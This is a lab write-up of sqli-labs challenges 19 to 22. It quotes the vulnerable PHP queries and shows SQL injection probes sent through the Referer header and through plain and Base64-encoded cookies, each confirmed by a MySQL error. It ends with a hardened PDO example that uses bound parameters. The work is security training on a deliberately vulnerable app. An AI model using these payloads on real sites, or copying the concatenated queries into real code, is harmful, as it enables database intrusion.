sqli labs 4
2016-10-13 12:15
1. Challenge 19:
The injection in challenge 19 is an HTTP header injection. A prerequisite for injecting is knowing the username and password.

    $row1 = mysql_fetch_array($result1);
    if($row1)
    {
        echo '<font color= "#FFFF00" font size = 3 >';
        // $uagent and $IP are interpolated into the INSERT without escaping
        $insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
        mysql_query($insert);
        //echo 'Your IP ADDRESS is: ' .$IP;
        echo "</font>";
        //echo "<br>";
        echo '<font color= "#0000ff" font size = 3 >';
        echo 'Your Referer is: ' .$uagent;
        echo "</font>";
        echo "<br>";
        print_r(mysql_error());
        echo "<br><br>";
        echo '<img src="../images/flag.jpg" />';
        echo "<br>";
    }

So the injection point is the Referer header.

Set the Referer to the following and the page displays normally:

    aa','') #

Set the Referer to the following and the page reports an error, so an injection exists here:

    aa'

Exploit:

    Referer: ' or 1=(select count(*) from usersw) ,'')#

Error:

    Table 'security.usersw' doesn't exist
2. Challenge 20:

Reading the source: set the cookie to a' and send the POST data uname=afda&passwd=d, with no submit parameter at the end. After submitting, the page reports this error:

    Issue with your mysql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''aa'''''' LIMIT 0,1' at line 1

OK, the injection is found: it is a cookie injection. Exploit:

    cookie: uname=aa' and (select count(*) from aa) >0 #

Error:

    Issue with your mysql: Table 'security.aa' doesn't exist
3. Challenge 21:

Straight to the source code analysis:

    echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
    echo '<font color= "orange" font size = 5 >';
    echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
    // the cookie value is Base64-decoded, then concatenated into the query inside ('...')
    $cookee = base64_decode($cookee);
    echo "<br></font>";
    $sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
    $result=mysql_query($sql);
    if (!$result)
    {
        die('Issue with your mysql: ' . mysql_error());
    }
    $row = mysql_fetch_array($result);

POST data: uname=admin1ds&passwd=fda

The uname value in the cookie is Base64-encoded.

Set the cookie to uname=' which, after encoding, is:

    cookie: uname=Jw==

Submitting it makes the page report an error:

    Issue with your mysql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''') LIMIT 0,1' at line 1

Set the cookie to uname=') and (select count(*) from user)>0 # which, after encoding, is:

    cookie: uname=JykgYW5kIChzZWxlY3QgY291bnQoKikgZnJvbSB1c2VyKT4wICM=

Returned error:

    Issue with your mysql: Table 'security.user' doesn't exist

OK, the injection is found.
4. Challenge 22:

Straight to the source code:

    echo '<font color= "orange" font size = 5 >';
    echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
    $cookee = base64_decode($cookee);
    // the decoded value is wrapped in double quotes, then concatenated into the query
    $cookee1 = '"'. $cookee. '"';
    echo "<br></font>";
    $sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";
    $result=mysql_query($sql);
    if (!$result)
    {
        die('Issue with your mysql: ' . mysql_error());
    }
    $row = mysql_fetch_array($result);
    if($row)
    {

POST data: uname=admin1ds&passwd=fda

The uname value in the cookie is Base64-encoded.

The SQL statement is:

    SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1
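A hardened counterpart to the queries in challenges 19, 21 and 22, as an added example that is not part of the original post or of sqli-labs: the decoded cookie and the Referer value are bound as parameters instead of concatenated, and database errors are logged rather than echoed to the page. It assumes PHP with the PDO SQLite driver so it runs offline; the function names and the sample user row are constructed for illustration.

```php
<?php
// Added example, not sqli-labs code. Uses an in-memory SQLite database via PDO
// so it runs offline; table and column names mirror the excerpts above.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
$db->exec('CREATE TABLE referers (referer TEXT, ip_address TEXT)');
$db->exec("INSERT INTO users (username, password) VALUES ('admin1', 'constructed-sample')");

// Challenges 21/22: look up the user named in the Base64 cookie.
function findUserFromCookie(PDO $db, string $cookie): ?array {
    $name = base64_decode($cookie, true);   // strict mode: false on invalid input
    if ($name === false || $name === '' || strlen($name) > 64) {
        return null;                         // reject instead of querying
    }
    try {
        // The value is bound, never concatenated, so ' and ") remain data.
        $stmt = $db->prepare('SELECT id, username FROM users WHERE username = ? LIMIT 1');
        $stmt->execute([$name]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row === false ? null : $row;
    } catch (PDOException $e) {
        error_log('user lookup failed: ' . $e->getMessage()); // server-side log only
        return null;                         // no driver error text in the response
    }
}

// Challenge 19: record the Referer header with bound parameters.
function logReferer(PDO $db, string $referer, string $ip): void {
    $stmt = $db->prepare('INSERT INTO referers (referer, ip_address) VALUES (?, ?)');
    $stmt->execute([$referer, $ip]);
}

// Cookie values taken from the write-up above, plus one constructed valid cookie.
$cookies = ['Jw==', 'JykgYW5kIChzZWxlY3QgY291bnQoKikgZnJvbSB1c2VyKT4wICM=', base64_encode('admin1')];
foreach ($cookies as $c) {
    $row = findUserFromCookie($db, $c);
    echo $c, ' => ', $row ? 'found ' . $row['username'] : 'no match', PHP_EOL;
}

logReferer($db, "aa'", '192.0.2.10');        // constructed IP; value stored verbatim
echo 'stored referer: ', $db->query('SELECT referer FROM referers')->fetchColumn(), PHP_EOL;
```

With bound parameters the two cookie values from the write-up return no row and raise no SQL error, so the error-message channel used in all four challenges is closed as well.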